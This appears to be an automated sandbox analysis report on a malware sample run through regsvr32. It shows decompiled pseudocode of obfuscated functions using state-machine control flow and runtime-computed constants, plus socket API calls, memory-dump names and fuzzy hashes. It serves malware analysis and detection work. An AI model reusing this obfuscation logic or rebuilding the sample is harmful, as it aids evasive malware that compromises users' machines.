				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				unsigned int _v708;
				signed int _t316;
				void* _t319;
				intOrPtr _t320;
				intOrPtr _t323;
				intOrPtr _t328;
				void* _t331;
				void* _t334;
				void* _t335;
				char _t342;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				unsigned int* _t372;

				_t372 =  &_v708;
				_v576 = 0xda0c08;
				_v576 = _v576 + 0xffff47d7;
				_t335 = 0x67615db;
				_v576 = _v576 ^ 0x00d953de;
				_v616 = 0x1aa62a;
				_v616 = _v616 ^ 0x887273cb;
				_v616 = _v616 ^ 0x8868d4e1;
				_v696 = 0x6cc5ff;
				_v696 = _v696 + 0xffff0f33;
				_v696 = _v696 + 0xffffebff;
				_v696 = _v696 + 0xffff9323;
				_v696 = _v696 ^ 0x006b5457;
				_v620 = 0xd441f6;
				_v620 = _v620 >> 2;
				_v620 = _v620 ^ 0x0035107d;
				_v668 = 0xe6e8c4;
				_v668 = _v668 + 0xffff0cc3;
				_v668 = _v668 | 0x11364c4e;
				_v668 = _v668 ^ 0x11fae4e7;
				_v664 = 0xedeede;
				_v664 = _v664 + 0x8dc4;
				_v664 = _v664 >> 0xb;
				_v664 = _v664 ^ 0x00096569;
				_v644 = 0x7bf23b;
				_v644 = _v644 + 0x7679;
				_v644 = _v644 << 2;
				_v644 = _v644 ^ 0x01f0e7c7;
				_v588 = 0xd55e4f;
				_v588 = _v588 >> 8;
				_v588 = _v588 ^ 0x000a9525;
				_v648 = 0x4b711e;
				_v648 = _v648 + 0xffff1f62;
				_v648 = _v648 ^ 0xa93f12d6;
				_v648 = _v648 ^ 0xa9763896;
				_v584 = 0xdb5f0a;
				_v584 = _v584 * 0x19;
				_t334 = 0;
				_v584 = _v584 ^ 0x156e4d85;
				_v608 = 0x3263c9;
				_v608 = _v608 + 0xe60;
				_v608 = _v608 ^ 0x0036f835;
				_v640 = 0x3b5ffd;
				_t365 = 0x46;
				_v640 = _v640 * 5;
				_v640 = _v640 / _t365;
				_v640 = _v640 ^ 0x000ce458;
				_v708 = 0xb95ed6;
				_t366 = 0x5a;
				_v708 = _v708 / _t366;
				_v708 = _v708 ^ 0x64dff63e;
				_v708 = _v708 >> 0x10;
				_v708 = _v708 ^ 0x000970e9;
				_v672 = 0xda5c0b;
				_v672 = _v672 >> 5;
				_v672 = _v672 * 0x6e;
				_v672 = _v672 ^ 0x02ed68c8;
				_v600 = 0xb0c206;
				_v600 = _v600 + 0x21e9;
				_v600 = _v600 ^ 0x00b07205;
				_v684 = 0x1b8021;
				_v684 = _v684 << 2;
				_v684 = _v684 >> 0xb;
				_v684 = _v684 << 8;
				_v684 = _v684 ^ 0x0007a69d;
				_v700 = 0x716346;
				_v700 = _v700 >> 0xe;
				_v700 = _v700 << 9;
				_v700 = _v700 | 0x54417142;
				_v700 = _v700 ^ 0x544d1ccb;
				_v704 = 0x83733f;
				_v704 = _v704 << 0xe;
				_v704 = _v704 << 1;
				_t367 = 0xf;
				_v704 = _v704 / _t367;
				_v704 = _v704 ^ 0x0c51ca4a;
				_v676 = 0x255e7;
				_v676 = _v676 ^ 0x45c0186f;
				_v676 = _v676 ^ 0x0e243a79;
				_v676 = _v676 ^ 0x4be8c079;
				_v652 = 0xc8a42f;
				_t368 = 0x3b;
				_v652 = _v652 * 0x1e;
				_v652 = _v652 + 0xffffdb98;
				_v652 = _v652 ^ 0x178e8932;
				_v660 = 0x399dd9;
				_v660 = _v660 << 0x10;
				_v660 = _v660 << 1;
				_v660 = _v660 ^ 0x3bb87d79;
				_v596 = 0x4a6152;
				_v596 = _v596 + 0xeb3a;
				_v596 = _v596 ^ 0x00451e15;
				_v604 = 0x1a296a;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x000806f7;
				_v628 = 0x8a6a9a;
				_v628 = _v628 << 0xc;
				_v628 = _v628 / _t368;
				_v628 = _v628 ^ 0x02ddb0c3;
				_v612 = 0x56dff1;
				_v612 = _v612 << 4;
				_v612 = _v612 ^ 0x056559b2;
				_v592 = 0xb835f;
				_v592 = _v592 ^ 0x56373199;
				_v592 = _v592 ^ 0x563f1b5a;
				_v636 = 0x2555d1;
				_v636 = _v636 + 0xffff7c76;
				_v636 = _v636 | 0x931e680c;
				_v636 = _v636 ^ 0x933edc2a;
				_v688 = 0x729e7a;
				_v688 = _v688 + 0x52a9;
				_v688 = _v688 << 6;
				_v688 = _v688 ^ 0x08219d26;
				_v688 = _v688 ^ 0x149a839d;
				_v656 = 0xbb5b70;
				_v656 = _v656 + 0x6c7b;
				_v656 = _v656 | 0x24d7418a;
				_v656 = _v656 ^ 0x24f0c3f7;
				_v692 = 0xac0342;
				_v692 = _v692 + 0x6c81;
				_v692 = _v692 >> 0xd;
				_v692 = _v692 + 0xbde1;
				_v692 = _v692 ^ 0x00055202;
				_v632 = 0x18da0d;
				_t369 = 0x57;
				_v632 = _v632 * 0x5d;
				_v632 = _v632 + 0xffff6f25;
				_v632 = _v632 ^ 0x090e1c26;
				_v580 = 0xa5e89c;
				_v580 = _v580 / _t369;
				_v580 = _v580 ^ 0x000ce540;
				_v680 = 0x842c1c;
				_v680 = _v680 << 5;
				_v680 = _v680 ^ 0x259e7cb4;
				_v680 = _v680 + 0xffff46bd;
				_v680 = _v680 ^ 0x3515c03d;
				_v624 = 0x501187;
				_v624 = _v624 ^ 0x46ba0327;
				_v624 = _v624 ^ 0x46eeb458;
				_t364 = _v624;
				do {
					while(_t335 != 0x2d5e71a) {
						if(_t335 == 0x67615db) {
							_t335 = 0xf75ce9f;
							continue;
						} else {
							if(_t335 == 0x7a053ff) {
								E040F1538(_v680, _v624, _t364);
							} else {
								if(_t335 == 0x7a51f41) {
									_push(_v640);
									_push(_v608);
									_push(_v584);
									_t319 = E040EE1F8(0x40d1000, _v648, __eflags);
									_t320 =  *0x40f6214; // 0x0
									_t323 =  *0x40f6214; // 0x0
									E040F2D0A(_v672, __eflags, _t323 + 0x23c, _v600, _v684, _v700, 0x40d1000,  &_v524, _t320 + 0x34, _t319);
									E040EFECB(_t319, _v704, _v676, _v652, _v660);
									_t372 =  &(_t372[0xe]);
									_t335 = 0x2d5e71a;
									continue;
								} else {
									if(_t335 == 0xa48fbff) {
										_v572 = _v572 - E040D5477(_t335);
										_t335 = 0x7a51f41;
										asm("sbb [esp+0x9c], edx");
										continue;
									} else {
										if(_t335 == 0xd7f7f02) {
											_t328 = _v568;
											_t342 = _v572;
											_v560 = _t328;
											_v552 = _t328;
											_v544 = _t328;
											_v536 = _t328;
											_v532 = _v620;
											_v564 = _t342;
											_v556 = _t342;
											_v548 = _t342;
											_v540 = _t342;
											_t331 = E040F44FF(_v656, _v692, _t342, _v632, _t342, _v580,  &_v564, _t364);
											_t372 =  &(_t372[6]);
											__eflags = _t331;
											_t334 =  !=  ? 1 : _t334;
											_t335 = 0x7a053ff;
											continue;
										} else {
											if(_t335 != 0xf75ce9f) {
												goto L16;
											} else {
												E040ECA1F(_v668, _v664,  &_v572, _v644, _v588);
												_t372 =  &(_t372[3]);
												_t335 = 0xa48fbff;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t334;
					}
					_t316 = E040F45CA( &_v524, _v596, _t335, _t335, _v604, _v628, _v612, _v616, _v592, _v636, 0, _v688, _v696, _v576);
					_t364 = _t316;
					_t372 =  &(_t372[0xc]);
					__eflags = _t316 - 0xffffffff;
					if(__eflags == 0) {
						_t335 = 0xc46350e;
						goto L16;
					} else {
						_t335 = 0xd7f7f02;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t335 - 0xc46350e;
				} while (__eflags != 0);
				goto L19;
			}

0x040ee955
0x040ee95f
0x040ee96c
0x040ee977
0x040ee97c
0x040ee987
0x040ee98f
0x040ee997
0x040ee99f
0x040ee9a7
0x040ee9af
0x040ee9b7
0x040ee9bf
0x040ee9c7
0x040ee9cf
0x040ee9d4
0x040ee9dc
0x040ee9e4
0x040ee9ec
0x040ee9f4
0x040ee9fc
0x040eea04
0x040eea0c
0x040eea11
0x040eea19
0x040eea21
0x040eea29
0x040eea2e
0x040eea36
0x040eea41
0x040eea49
0x040eea54
0x040eea5c
0x040eea64
0x040eea6c
0x040eea74
0x040eea87
0x040eea8e
0x040eea90
0x040eea9b
0x040eeaa3
0x040eeaab
0x040eeab3
0x040eeac2
0x040eeac5
0x040eead1
0x040eead5
0x040eeadd
0x040eeae9
0x040eeaec
0x040eeaf0
0x040eeaf8
0x040eeafd
0x040eeb05
0x040eeb0d
0x040eeb17
0x040eeb1b
0x040eeb23
0x040eeb2b
0x040eeb33
0x040eeb3b
0x040eeb43
0x040eeb48
0x040eeb4d
0x040eeb52
0x040eeb5a
0x040eeb62
0x040eeb67
0x040eeb6e
0x040eeb76
0x040eeb7e
0x040eeb86
0x040eeb8b
0x040eeb95
0x040eeb9a
0x040eeba0
0x040eeba8
0x040eebb0
0x040eebb8
0x040eebc0
0x040eebc8
0x040eebd5
0x040eebd8
0x040eebdc
0x040eebe4
0x040eebec
0x040eebf4
0x040eebf9
0x040eebfd
0x040eec05
0x040eec10
0x040eec1b
0x040eec26
0x040eec2e
0x040eec33
0x040eec3b
0x040eec43
0x040eec50
0x040eec54
0x040eec5c
0x040eec64
0x040eec69
0x040eec71
0x040eec7c
0x040eec87
0x040eec92
0x040eec9a
0x040eeca2
0x040eecaa
0x040eecb2
0x040eecba
0x040eecc2
0x040eecc7
0x040eeccf
0x040eecd7
0x040eecdf
0x040eece7
0x040eecef
0x040eecf7
0x040eecff
0x040eed07
0x040eed0c
0x040eed14
0x040eed1c
0x040eed29
0x040eed2a
0x040eed2e
0x040eed36
0x040eed3e
0x040eed52
0x040eed59
0x040eed64
0x040eed6c
0x040eed71
0x040eed79
0x040eed86
0x040eed8e
0x040eed96
0x040eed9e
0x040eeda6
0x040eedaa
0x040eedaa
0x040eedbc
0x040eef46
0x00000000
0x040eedc2
0x040eedc8
0x040eefca
0x040eedce
0x040eedd4
0x040eeec6
0x040eeecf
0x040eeed3
0x040eeede
0x040eeee8
0x040eef0a
0x040eef1d
0x040eef34
0x040eef39
0x040eef3c
0x00000000
0x040eedda
0x040eede0
0x040eeeae
0x040eeeb5
0x040eeeba
0x00000000
0x040eede6
0x040eede8
0x040eee20
0x040eee27
0x040eee2e
0x040eee35
0x040eee3c
0x040eee43
0x040eee4f
0x040eee65
0x040eee75
0x040eee7c
0x040eee83
0x040eee8f
0x040eee96
0x040eee9a
0x040eee9c
0x040eee9f
0x00000000
0x040eedea
0x040eedf0
0x00000000
0x040eedf6
0x040eee11
0x040eee16
0x040eee19
0x00000000
0x040eee19
0x040eedf0
0x040eede8
0x040eede0
0x040eedd4
0x040eedc8
0x040eefd3
0x040eefdc
0x040eefdc
0x040eef98
0x040eef9d
0x040eef9f
0x040eefa2
0x040eefa5
0x040eefae
0x00000000
0x040eefa7
0x040eefa7
0x00000000
0x040eefa7
0x00000000
0x040eefb3
0x040eefb3
0x040eefb3
0x00000000

Strings

{l, xrefs: 040EECDF
BqAT, xrefs: 040EEB6E
RaJ, xrefs: 040EEC05
p, xrefs: 040EEAFD
WTk, xrefs: 040EE9BF
yv, xrefs: 040EEA21
:, xrefs: 040EEC10
!, xrefs: 040EEB2B
ie, xrefs: 040EEA11

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: :$BqAT$RaJ$WTk$ie$yv${l$!$p
API String ID: 0-4263964199
Opcode ID: 3bac4745d3e75e1a51a58baa02c0f981bde3829b37c293e41bcff2f1c80b2057
Instruction ID: 78d086e91ad5338944dd55f3655a171bb6bedd476cc429e6fa33f9fc8b4a712b
Opcode Fuzzy Hash: 3bac4745d3e75e1a51a58baa02c0f981bde3829b37c293e41bcff2f1c80b2057
Instruction Fuzzy Hash: 49F13F710083808FD3A8CF66C549A9FFBE1FBC4758F10891DE2AA96260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100011C0, Relevance: 10.6, APIs: 7, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 100011F1
_memset.LIBCMT ref: 10001205
htonl.WS2_32(00000000), ref: 1000121B
htons.WS2_32(?), ref: 1000122F
socket.WS2_32(00000002,00000002,00000000), ref: 10001245
bind.WS2_32(?,?,00000010), ref: 1000126A
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 100012AC

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction ID: 88ed1bb05716eef25c8d7e89d15ea7d56457a166ccc4c5acc9453768105f33a4
Opcode Fuzzy Hash: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction Fuzzy Hash: 1C215974A01228AFE760DF60CC85BD9B7B4EF49714F1081D8E949AB381CB71A9C2DF51

Uniqueness

Uniqueness Score: -1.00%

Function 040F36AA, Relevance: 10.4, Strings: 8, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E040F36AA() {
				signed int _t373;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				intOrPtr _t383;
				signed int _t385;
				signed int _t387;
				void* _t392;
				signed int _t435;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t449;
				signed int* _t453;

				 *_t453 = 0x507140;
				_t392 = 0xe12044f;
				_t453[4] =  *_t453 * 0x71;
				_t438 = 0x6b;
				_t453[5] = _t453[4] / _t438;
				_t453[5] = _t453[5] >> 9;
				_t453[5] = _t453[5] ^ 0x00002a7b;
				_t453[9] = 0x87b94d;
				_t453[9] = _t453[9] + 0xffff92a0;
				_t453[9] = _t453[9] + 0x79ac;
				_t453[9] = _t453[9] >> 3;
				_t453[9] = _t453[9] ^ 0x0010f8b2;
				_t453[0x18] = 0x43735f;
				_t453[0x18] = _t453[0x18] << 0xa;
				_t453[0x18] = _t453[0x18] + 0xffff408e;
				_t453[0x18] = _t453[0x18] ^ 0x0dccbc8d;
				_t453[0x19] = 0x2e99ff;
				_t439 = 0x48;
				_t453[0x19] = _t453[0x19] / _t439;
				_t453[0x19] = _t453[0x19] | 0xc1c83132;
				_t453[0x19] = _t453[0x19] ^ 0xc1c60879;
				_t453[0xc] = 0xdcf188;
				_t440 = 0x21;
				_t453[0x2b] = _t453[0x2b] & 0x00000000;
				_t453[0xc] = _t453[0xc] * 0x48;
				_t453[0xc] = _t453[0xc] + 0xb8d0;
				_t453[0xc] = _t453[0xc] + 0xe79e;
				_t453[0xc] = _t453[0xc] ^ 0x3e220605;
				_t453[0x1f] = 0x3f10b8;
				_t453[0x1f] = _t453[0x1f] | 0x536a71f8;
				_t453[0x1f] = _t453[0x1f] ^ 0x537d907f;
				_t453[0x17] = 0xda4ece;
				_t453[0x17] = _t453[0x17] / _t440;
				_t453[0x17] = _t453[0x17] + 0xffff6c3f;
				_t453[0x17] = _t453[0x17] ^ 0x000916d6;
				_t453[0x21] = 0x81e16;
				_t441 = 0x1f;
				_t453[0x20] = _t453[0x21] * 0x37;
				_t453[0x20] = _t453[0x20] ^ 0x01bbd9e8;
				_t453[0x12] = 0x23ff7a;
				_t453[0x12] = _t453[0x12] + 0xda88;
				_t453[0x12] = _t453[0x12] << 9;
				_t453[0x12] = _t453[0x12] ^ 0x49b967a0;
				_t453[0x25] = 0xa4ae1d;
				_t453[0x25] = _t453[0x25] + 0xffff1e93;
				_t453[0x25] = _t453[0x25] ^ 0x00a3b794;
				_t453[0x1a] = 0xc58380;
				_t453[0x1a] = _t453[0x1a] + 0xffff63f4;
				_t453[0x1a] = _t453[0x1a] ^ 0x00c360dd;
				_t453[0xa] = 0x315c71;
				_t453[0xa] = _t453[0xa] * 0x2d;
				_t453[0xa] = _t453[0xa] << 4;
				_t453[0xa] = _t453[0xa] >> 9;
				_t453[0xa] = _t453[0xa] ^ 0x004c0641;
				_t453[0x26] = 0xfaa693;
				_t453[0x26] = _t453[0x26] / _t441;
				_t453[0x26] = _t453[0x26] ^ 0x0006da62;
				_t453[6] = 0x2e22d8;
				_t453[6] = _t453[6] + 0x1da5;
				_t453[6] = _t453[6] ^ 0x7a3436a8;
				_t453[6] = _t453[6] + 0x3380;
				_t453[6] = _t453[6] ^ 0x7a1ea83a;
				_t453[0xe] = 0x225cf9;
				_t442 = 0x46;
				_t453[0xf] = _t453[0xe] * 0xd;
				_t453[0xf] = _t453[0xf] / _t442;
				_t453[0xf] = _t453[0xf] ^ 0x000c9e58;
				_t453[0x1e] = 0xb4cd70;
				_t443 = 5;
				_t453[0x1e] = _t453[0x1e] / _t443;
				_t453[0x1e] = _t453[0x1e] ^ 0x00223e8b;
				_t453[0x25] = 0x175145;
				_t453[0x25] = _t453[0x25] + 0xffffbe60;
				_t453[0x25] = _t453[0x25] ^ 0x0015ea4b;
				_t453[0x16] = 0x9a90a6;
				_t453[0x16] = _t453[0x16] >> 1;
				_t453[0x16] = _t453[0x16] | 0x97e6917e;
				_t453[0x16] = _t453[0x16] ^ 0x97edbee9;
				_t453[0x14] = 0x10553c;
				_t453[0x14] = _t453[0x14] | 0x69ed7b68;
				_t453[0x14] = _t453[0x14] ^ 0x8ccf5101;
				_t453[0x14] = _t453[0x14] ^ 0xe532736d;
				_t453[0x12] = 0x5e103c;
				_t453[0x12] = _t453[0x12] ^ 0xd5bdf2ed;
				_t453[0x12] = _t453[0x12] | 0x536bb37e;
				_t453[0x12] = _t453[0x12] ^ 0xd7e39e3a;
				_t453[6] = 0xad714c;
				_t453[6] = _t453[6] << 5;
				_t444 = 0x5a;
				_t453[6] = _t453[6] * 0x77;
				_t453[6] = _t453[6] | 0x8fd7f967;
				_t453[6] = _t453[6] ^ 0x9ffa7b5b;
				_t453[0x29] = 0x969a62;
				_t453[0x29] = _t453[0x29] + 0xffff3747;
				_t453[0x29] = _t453[0x29] ^ 0x009bad24;
				_t453[0x22] = 0xa29aa2;
				_t453[0x22] = _t453[0x22] + 0xffff9bca;
				_t453[0x22] = _t453[0x22] ^ 0x00a8d7f4;
				_t453[0x28] = 0x5c718d;
				_t453[0x28] = _t453[0x28] / _t444;
				_t453[0x28] = _t453[0x28] ^ 0x000e04a7;
				_t453[0x15] = 0x6aed70;
				_t453[0x15] = _t453[0x15] | 0x24270adc;
				_t453[0x15] = _t453[0x15] ^ 0x00a30154;
				_t453[0x15] = _t453[0x15] ^ 0x24c5236d;
				_t453[0x20] = 0x9ad963;
				_t453[0x20] = _t453[0x20] ^ 0x804e7f4a;
				_t453[0x20] = _t453[0x20] ^ 0x80d9ea50;
				_t453[0x1c] = 0xc68496;
				_t453[0x1c] = _t453[0x1c] >> 0x10;
				_t453[0x1c] = _t453[0x1c] ^ 0x0003f168;
				_t453[0x24] = 0x7e4214;
				_t453[0x24] = _t453[0x24] << 4;
				_t453[0x24] = _t453[0x24] ^ 0x07e08805;
				_t453[0x11] = 0x92d404;
				_t445 = 0x3c;
				_t453[0x10] = _t453[0x11] / _t445;
				_t453[0x10] = _t453[0x10] + 0x2a76;
				_t453[0x10] = _t453[0x10] ^ 0x0004ebe7;
				_t453[9] = 0xe8ea05;
				_t453[9] = _t453[9] + 0xffffd5a4;
				_t453[9] = _t453[9] << 7;
				_t453[9] = _t453[9] + 0xffff1c2a;
				_t453[9] = _t453[9] ^ 0x7454948f;
				_t453[7] = 0x853308;
				_t453[7] = _t453[7] + 0xffff5128;
				_t453[7] = _t453[7] + 0x9f37;
				_t453[7] = _t453[7] | 0x54c51839;
				_t453[7] = _t453[7] ^ 0x54ca1cec;
				_t453[0x1c] = 0x270edd;
				_t453[0x1c] = _t453[0x1c] + 0x9c5c;
				_t453[0x1c] = _t453[0x1c] ^ 0x00251ad9;
				_t453[0x22] = 0x4b1e01;
				_t453[0x22] = _t453[0x22] >> 0xa;
				_t453[0x22] = _t453[0x22] ^ 0x00014be5;
				_t453[0xf] = 0x1097d4;
				_t453[0xf] = _t453[0xf] ^ 0x70356bb9;
				_t453[0xf] = _t453[0xf] << 7;
				_t453[0xf] = _t453[0xf] ^ 0x12f26116;
				_t453[0xd] = 0x3e61;
				_t453[0xd] = _t453[0xd] ^ 0x4940d563;
				_t453[0xd] = _t453[0xd] << 5;
				_t453[0xd] = _t453[0xd] ^ 0x28127601;
				_t453[0x19] = 0xea3040;
				_t265 =  &(_t453[0x19]); // 0xea3040
				_t446 = 0x24;
				_t390 = _t453[0x2a];
				_t453[0x1a] =  *_t265 * 0x3e;
				_t435 = _t453[0x2a];
				_t453[0x1a] = _t453[0x1a] / _t446;
				_t453[0x1a] = _t453[0x1a] ^ 0x01901c81;
				_t453[0xd] = 0xdd1c82;
				_t447 = 0x39;
				_t451 = _t453[0x29];
				_t453[0xc] = _t453[0xd] * 0x64;
				_t453[0xc] = _t453[0xc] / _t447;
				_t453[0xc] = _t453[0xc] ^ 0x01838ff7;
				L1:
				while(1) {
					while(_t392 != 0x17dddcb) {
						if(_t392 == 0x8a29766) {
							E040F2B09(_t453[0x24], _t435, _t453[0x10], _t453[0xd]);
							_t392 = 0xcdeb26f;
							continue;
						} else {
							if(_t392 == 0xac116a6) {
								E040F0DB1(_t453[0x1b],  &(_t453[0x2d]), __eflags, _t453[0xd], _t392, _t453[0x1e]);
								_t373 = E040E09DD(_t453[0x1b],  &(_t453[0x30]), _t453[0x24], _t453[0x15]);
								_t451 = _t373;
								_t453 =  &(_t453[5]);
								_t392 = 0xf1147e4;
								 *((short*)(_t373 - 2)) = 0;
								continue;
							} else {
								if(_t392 == 0xcdeb26f) {
									_t337 =  &(_t453[0x19]); // 0xea3040
									E040F1538( *_t337, _t453[0xc], _t390);
								} else {
									if(_t392 == 0xe12044f) {
										_t392 = 0xac116a6;
										continue;
									} else {
										if(_t392 == 0xe899f05) {
											_t378 = E040EE406(_t453[0x11], _t453[0x33], _t392, _t453[0x2b], _t453[0x30], _t435, _t453[0xb], _t392,  &(_t453[0x2e]), _t453[0x2d], _t453[0x17], _t453[0x21], _t392, _t390);
											_t453 =  &(_t453[0xc]);
											__eflags = _t378;
											if(_t378 == 0) {
												L17:
												_t379 = _t453[0x2a];
											} else {
												_t449 = _t435;
												while(1) {
													__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
													if( *((intOrPtr*)(_t449 + 4)) != 4) {
														goto L14;
													}
													L13:
													_t387 = E040F061D(_t453[0x1d], _t451, _t449 + 0xc, _t453[0x24], _t453[0x10]);
													_t453 =  &(_t453[3]);
													__eflags = _t387;
													if(_t387 == 0) {
														_t379 = 1;
														_t453[0x2a] = 1;
													} else {
														goto L14;
													}
													goto L18;
													L14:
													_t385 =  *_t449;
													__eflags = _t385;
													if(_t385 == 0) {
														goto L17;
													} else {
														_t449 = _t449 + _t385;
														__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
														if( *((intOrPtr*)(_t449 + 4)) != 4) {
															goto L14;
														}
													}
													goto L18;
												}
											}
											L18:
											__eflags = _t379;
											if(__eflags == 0) {
												L20:
												_t392 = 0xe899f05;
											} else {
												_t383 =  *0x40f6208; // 0x0
												E040F27BC(_t453[0xa], _t453[8],  *((intOrPtr*)(_t383 + 0x18)), _t453[0x1c]);
												_t392 = 0x8a29766;
											}
											continue;
											L30:
										} else {
											if(_t392 != 0xf1147e4) {
												L26:
												__eflags = _t392 - 0x2906cf2;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t382 = E040F45CA( &(_t453[0x38]), _t453[0x2f], _t392, _t392, _t453[0x23], _t453[0x12], _t453[0x2d], 1, _t453[0xb], _t453[0x12], 0x2000000, _t453[0x1f], _t453[0x18], _t453[8] | 0x00000006);
												_t390 = _t382;
												_t453 =  &(_t453[0xc]);
												if(_t382 != 0xffffffff) {
													_t392 = 0x17dddcb;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags = 0;
						return 0;
						goto L30;
					}
					_push(_t392);
					_push(_t392);
					_t453[0x2c] = 0x1000;
					_t435 = E040DC5D8(0x1000);
					_t453 =  &(_t453[3]);
					__eflags = _t435;
					if(__eflags != 0) {
						goto L20;
					} else {
						_t392 = 0xcdeb26f;
						goto L26;
					}
					goto L29;
				}
			}

0x040f36b0
0x040f36bd
0x040f36c6
0x040f36d0
0x040f36d5
0x040f36db
0x040f36e0
0x040f36e8
0x040f36f0
0x040f36f8
0x040f3700
0x040f3705
0x040f370d
0x040f3715
0x040f371a
0x040f3722
0x040f372a
0x040f3736
0x040f373b
0x040f3741
0x040f3749
0x040f3751
0x040f375e
0x040f3761
0x040f3769
0x040f376d
0x040f3775
0x040f377d
0x040f3785
0x040f378d
0x040f3795
0x040f379d
0x040f37ad
0x040f37b1
0x040f37b9
0x040f37c1
0x040f37d4
0x040f37d5
0x040f37dc
0x040f37e7
0x040f37ef
0x040f37f7
0x040f37fc
0x040f3804
0x040f380f
0x040f381a
0x040f3825
0x040f382d
0x040f3835
0x040f383d
0x040f384a
0x040f384e
0x040f3853
0x040f3858
0x040f3860
0x040f3874
0x040f387b
0x040f3886
0x040f3890
0x040f3898
0x040f38a0
0x040f38a8
0x040f38b0
0x040f38bf
0x040f38c2
0x040f38ce
0x040f38d2
0x040f38da
0x040f38e6
0x040f38eb
0x040f38f1
0x040f38f9
0x040f3904
0x040f390f
0x040f391a
0x040f3922
0x040f3926
0x040f392e
0x040f3936
0x040f393e
0x040f3946
0x040f394e
0x040f3956
0x040f395e
0x040f3966
0x040f396e
0x040f3976
0x040f397e
0x040f3988
0x040f398b
0x040f398f
0x040f3997
0x040f399f
0x040f39aa
0x040f39b5
0x040f39c0
0x040f39cb
0x040f39d6
0x040f39e1
0x040f39f7
0x040f39fe
0x040f3a09
0x040f3a11
0x040f3a19
0x040f3a21
0x040f3a29
0x040f3a34
0x040f3a3f
0x040f3a4a
0x040f3a52
0x040f3a57
0x040f3a5f
0x040f3a6a
0x040f3a72
0x040f3a7d
0x040f3a89
0x040f3a8c
0x040f3a90
0x040f3a98
0x040f3aa0
0x040f3aa8
0x040f3ab2
0x040f3ab7
0x040f3abf
0x040f3ac7
0x040f3acf
0x040f3ad7
0x040f3adf
0x040f3ae7
0x040f3aef
0x040f3af7
0x040f3aff
0x040f3b07
0x040f3b12
0x040f3b1a
0x040f3b25
0x040f3b2d
0x040f3b35
0x040f3b3a
0x040f3b42
0x040f3b4a
0x040f3b52
0x040f3b57
0x040f3b5f
0x040f3b67
0x040f3b6e
0x040f3b71
0x040f3b78
0x040f3b84
0x040f3b8b
0x040f3b8f
0x040f3b97
0x040f3ba4
0x040f3ba5
0x040f3bac
0x040f3bb6
0x040f3bba
0x00000000
0x040f3bc2
0x040f3bc2
0x040f3bd4
0x040f3d95
0x040f3d9c
0x00000000
0x040f3bda
0x040f3be0
0x040f3d4f
0x040f3d6a
0x040f3d6f
0x040f3d71
0x040f3d76
0x040f3d7b
0x00000000
0x040f3be6
0x040f3bec
0x040f3df4
0x040f3df9
0x040f3bf2
0x040f3bf8
0x040f3d31
0x00000000
0x040f3bfe
0x040f3c04
0x040f3cac
0x040f3cb1
0x040f3cb4
0x040f3cb6
0x040f3cf7
0x040f3cf7
0x040f3cb8
0x040f3cb8
0x040f3cba
0x040f3cba
0x040f3cbe
0x00000000
0x00000000
0x040f3cc0
0x040f3cd5
0x040f3cda
0x040f3cdd
0x040f3cdf
0x040f3ced
0x040f3cee
0x00000000
0x00000000
0x00000000
0x00000000
0x040f3ce1
0x040f3ce1
0x040f3ce3
0x040f3ce5
0x00000000
0x040f3ce7
0x040f3ce7
0x040f3cba
0x040f3cbe
0x00000000
0x00000000
0x040f3cbe
0x00000000
0x040f3ce5
0x040f3cba
0x040f3cfe
0x040f3cfe
0x040f3d00
0x040f3d27
0x040f3d27
0x040f3d02
0x040f3d06
0x040f3d16
0x040f3d1d
0x040f3d1d
0x00000000
0x00000000
0x040f3c06
0x040f3c0c
0x040f3de2
0x040f3de2
